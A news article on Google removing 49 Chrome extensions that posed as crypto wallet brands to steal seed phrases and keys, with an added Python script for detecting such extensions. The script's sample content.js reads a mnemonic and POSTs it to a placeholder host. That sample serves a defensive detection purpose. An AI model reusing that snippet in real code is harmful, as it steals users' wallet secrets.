Google has removed 49 malicious Chrome browser extensions from its Web Store that contained code used to hijack cryptocurrency wallets and steal sensitive information.
Cybersecurity researchers at MyCrypto and PhishFort discovered a range of malicious Chrome extensions targeting cryptocurrency brands and their users. Google removed the malicious extensions within 24 hours.
Some of the extensions had fake 5-star ratings and positive reviews, most of them banal comments such as “good,” “helpful app,” or “legit extension” written by a network of fake users.
According to MyCrypto, all of these extensions function in the same way; only the cryptocurrency brand they impersonate varies depending on the users being targeted.
Names such as Ledger, MyEtherWallet, and Trezor are among the brands targeted by the malicious extensions with Ledger being the most targeted brand.
| Brand | Website | Share of malicious browser extensions in the MyCrypto dataset |
|---|---|---|
| Ledger | <https://www.ledger.com/> | 57% |
| Trezor | <https://trezor.io/> | 8% |
| Jaxx | <https://jaxx.io/> | 2% |
| Electrum | <https://electrum.org/> | 4% |
| MyEtherWallet | <https://myetherwallet.com> | 22% |
| KeepKey | <https://shapeshift.io/keepkey/> | 4% |
According to MyCrypto, the share of the malicious extensions released to the store each month rose sharply, from 2.04% of releases in February to 63.26% in April.
How threat actors operate
Threat actors use the Chrome extensions to steal mnemonic phrases, private keys, and keystore files.
“Once the user has entered them, the extension sends an HTTP POST request to its backend, where the bad actors receive the secrets and empty the accounts.”
Not all secrets submitted to the malicious extensions were swept; according to MyCrypto, this is either because the bad actors are only interested in high-value accounts, or because they have to sweep accounts manually.
The researchers discovered 14 unique command and control (C2) servers; some of these C2 servers share fingerprints with other servers, indicating that the same actor(s) are behind them.
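As an added illustration of the pattern described above (this is not code from MyCrypto or PhishFort), the following Python triage script flags an unpacked extension that poses as one of the listed wallet brands yet contains code that reads a mnemonic or private key and sends it to a domain outside that brand's own. The brand-to-domain mapping, the regexes and the sample extension are assumptions constructed for the example.

```python
import json
import re
from urllib.parse import urlparse

# Legitimate domains for the brands named in the article (assumed mapping for this example).
BRAND_DOMAINS = {"ledger": {"ledger.com"}, "trezor": {"trezor.io"},
                 "myetherwallet": {"myetherwallet.com"}, "electrum": {"electrum.org"},
                 "jaxx": {"jaxx.io"}, "keepkey": {"shapeshift.io"}}
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s'\"]*)?")
SECRET_RE = re.compile(r"mnemonic|seed\s*phrase|private\s*key|keystore", re.I)
SEND_RE = re.compile(r"\bfetch\s*\(|XMLHttpRequest|method\s*:\s*['\"]POST", re.I)

def same_site(host, domain):
    return host == domain or host.endswith("." + domain)

def triage_extension(files):
    """files: {path: text} of an unpacked extension. Returns (file, url, reason) findings."""
    manifest = json.loads(files["manifest.json"])
    # Which wallet brand does the extension claim? Check its name and the sites it injects into.
    brands = {b for b in BRAND_DOMAINS if b in manifest.get("name", "").lower()}
    for script in manifest.get("content_scripts", []):
        for pattern in script.get("matches", []):
            host = urlparse(pattern.replace("*", "x")).hostname or ""
            brands |= {b for b, doms in BRAND_DOMAINS.items()
                       if any(same_site(host, d) for d in doms)}
    allowed = set().union(*(BRAND_DOMAINS[b] for b in brands))
    findings = []
    for path, text in files.items():
        if not path.endswith(".js"):
            continue
        # A brand-impersonating extension should only talk to that brand's own domains.
        for url in set(URL_RE.findall(text)):
            host = urlparse(url).hostname or ""
            if brands and not any(same_site(host, d) for d in allowed):
                findings.append((path, url, "off-brand endpoint"))
        # Code that touches secrets *and* makes requests matches the exfiltration pattern above.
        if SECRET_RE.search(text) and SEND_RE.search(text):
            findings.append((path, None, "reads wallet secrets and sends network requests"))
    return findings

# Constructed sample mimicking the extensions described above; the C2 domain is a placeholder.
SAMPLE_EXTENSION = {
    "manifest.json": json.dumps({"name": "Ledger Secure Wallet Helper",
                                 "content_scripts": [{"matches": ["https://*.ledger.com/*"],
                                                      "js": ["content.js"]}]}),
    "content.js": "const phrase = document.querySelector('#mnemonic').value;\n"
                  "fetch('https://ledger-backup.example/collect.php', {method: 'POST', body: phrase});",
}
```

Running `triage_extension(SAMPLE_EXTENSION)` reports both the off-brand endpoint and the secret-reading request code in `content.js`; a genuine helper that only calls the brand's own API produces no findings.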
“Some kits sent the phished data back to a Google Docs form. However, most hosted their own backend with custom PHP scripts,” MyCrypto's researchers explain.
“Whilst some of the domains are relatively old, 80% of the C2s were registered in March and April 2020 (an even split). The oldest domain (ledger.productions) has the most “connections” to other C2s in terms of fingerprints, so we have some indication of the same backend kit (or same actors behind this) for the majority of the extensions,” the report continues.
This is not the first time Chrome extensions have been abused
Threat actors have abused Google Chrome extensions before; back in February, Google found over 500 Chrome extensions that injected malicious ads and siphoned off user browsing data, sending it back to attacker-controlled servers. Those extensions had been downloaded millions of times from Google’s Chrome Web Store.